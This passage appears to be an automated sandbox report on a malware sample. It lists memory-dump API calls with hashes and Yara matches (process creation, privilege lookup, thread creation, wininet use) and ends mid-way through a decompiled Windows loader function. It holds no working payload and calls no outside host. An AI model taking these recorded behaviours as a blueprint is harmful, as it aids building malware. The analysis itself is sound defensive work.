                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
• Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
• Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
• Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
• Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
• Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 00096F88
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                                                                                                          • Opcode ID: d85d72153ef24544e4ceac26b91ad447824e9e588f30e7a06b14d59622c481bf
                                                                                                                                                                                                          • Instruction ID: 843388dbfa745a222a99e9a4e6401c03e08835f2cd5b154a8125b0c7ceaf47f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d85d72153ef24544e4ceac26b91ad447824e9e588f30e7a06b14d59622c481bf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 283190B1602704ABCB25DF68D8B1FABB7F8FB48700F00842DF61A9B241D771A545DBA0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 00096F88
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984FD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                          • String ID: .z`
                                                                                                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
                                                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
                                                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCD0,?,?), ref: 0009704C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089B92
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Load
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2234796835-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098594
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2186235152-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFA2,0008CFA2,?,00000000,?,?), ref: 00098660
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3899507212-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCD0,?,?), ref: 0009704C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFA2,0008CFA2,?,00000000,?,?), ref: 00098660
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3899507212-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D43B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E020D8788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				short* _v12;
                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                          				signed int _v40;
                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                          				signed int _v52;
                                                                                                                                                                                                          				signed int _v56;
                                                                                                                                                                                                          				signed int _v60;
                                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                                          				void* _t216;
                                                                                                                                                                                                          				intOrPtr _t231;
                                                                                                                                                                                                          				short* _t235;
                                                                                                                                                                                                          				intOrPtr _t257;
                                                                                                                                                                                                          				short* _t261;
                                                                                                                                                                                                          				intOrPtr _t284;
                                                                                                                                                                                                          				intOrPtr _t288;
                                                                                                                                                                                                          				void* _t314;
                                                                                                                                                                                                          				signed int _t318;
                                                                                                                                                                                                          				short* _t319;
                                                                                                                                                                                                          				intOrPtr _t321;
                                                                                                                                                                                                          				void* _t328;
                                                                                                                                                                                                          				void* _t329;
                                                                                                                                                                                                          				char* _t332;
                                                                                                                                                                                                          				signed int _t333;
                                                                                                                                                                                                          				signed int* _t334;
                                                                                                                                                                                                          				void* _t335;
                                                                                                                                                                                                          				void* _t338;
                                                                                                                                                                                                          				void* _t339;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t328 = __edx;
                                                                                                                                                                                                          				_t322 = __ecx;
                                                                                                                                                                                                          				_t318 = 0;
                                                                                                                                                                                                          				_t334 = _a4;
                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                          				_v48 = 0;
                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                                                          				_v32 = 0;
                                                                                                                                                                                                          				_v52 = 0;
                                                                                                                                                                                                          				if(_t334 == 0) {
                                                                                                                                                                                                          					_t329 = 0xc000000d;
                                                                                                                                                                                                          					L49:
                                                                                                                                                                                                          					_t334[0x11] = _v56;
                                                                                                                                                                                                          					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                                                                          					_t334[0x12] = _v60;
                                                                                                                                                                                                          					_t334[0x13] = _v28;
                                                                                                                                                                                                          					_t334[0x17] = _v20;
                                                                                                                                                                                                          					_t334[0x16] = _v48;
                                                                                                                                                                                                          					_t334[0x18] = _v40;
                                                                                                                                                                                                          					_t334[0x14] = _v32;
                                                                                                                                                                                                          					_t334[0x15] = _v52;
                                                                                                                                                                                                          					return _t329;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_v56 = 0;
                                                                                                                                                                                                          				if(E020D8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                                                                          					_v56 = 1;
                                                                                                                                                                                                          					if(_v8 != 0) {
                                                                                                                                                                                                          						_t207 = E020BE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                                          					_v8 = _t318;
                                                                                                                                                                                                          					E020D718A(_t207);
                                                                                                                                                                                                          					_t335 = _t335 + 4;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_v60 = _v60 | 0xffffffff;
                                                                                                                                                                                                          				if(E020D8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                                                                          					_t333 =  *_v8;
                                                                                                                                                                                                          					_v60 = _t333;
                                                                                                                                                                                                          					_t314 = E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                                          					_push(_t333);
                                                                                                                                                                                                          					_v8 = _t318;
                                                                                                                                                                                                          					E020D718A(_t314);
                                                                                                                                                                                                          					_t335 = _t335 + 4;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t216 = E020D8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                                                                          				_t332 = ";";
                                                                                                                                                                                                          				if(_t216 < 0) {
                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                          					if(E020D8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                                                                          						L30:
                                                                                                                                                                                                          						if(E020D8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                                                                          							L46:
                                                                                                                                                                                                          							_t329 = 0;
                                                                                                                                                                                                          							L47:
                                                                                                                                                                                                          							if(_v8 != _t318) {
                                                                                                                                                                                                          								E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							if(_v28 != _t318) {
                                                                                                                                                                                                          								if(_v20 != _t318) {
                                                                                                                                                                                                          									E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                                                                          									_v20 = _t318;
                                                                                                                                                                                                          									_v40 = _t318;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L49;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t231 = _v24;
                                                                                                                                                                                                          						_t322 = _t231 + 4;
                                                                                                                                                                                                          						_push(_t231);
                                                                                                                                                                                                          						_v52 = _t322;
                                                                                                                                                                                                          						E020D718A(_t231);
                                                                                                                                                                                                          						if(_t322 == _t318) {
                                                                                                                                                                                                          							_v32 = _t318;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_v32 = E020BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_v32 == _t318) {
                                                                                                                                                                                                          							_v52 = _t318;
                                                                                                                                                                                                          							L58:
                                                                                                                                                                                                          							_t329 = 0xc0000017;
                                                                                                                                                                                                          							goto L47;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							E020B2340(_v32, _v8, _v24);
                                                                                                                                                                                                          							_v16 = _v32;
                                                                                                                                                                                                          							_a4 = _t318;
                                                                                                                                                                                                          							_t235 = E020CE679(_v32, _t332);
                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                          								_t319 = _t235;
                                                                                                                                                                                                          								if(_t319 == 0) {
                                                                                                                                                                                                          									break;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								 *_t319 = 0;
                                                                                                                                                                                                          								_t321 = _t319 + 2;
                                                                                                                                                                                                          								E020BE2A8(_t322,  &_v68, _v16);
                                                                                                                                                                                                          								if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                          									_a4 = _a4 + 1;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_v16 = _t321;
                                                                                                                                                                                                          								_t235 = E020CE679(_t321, _t332);
                                                                                                                                                                                                          								_pop(_t322);
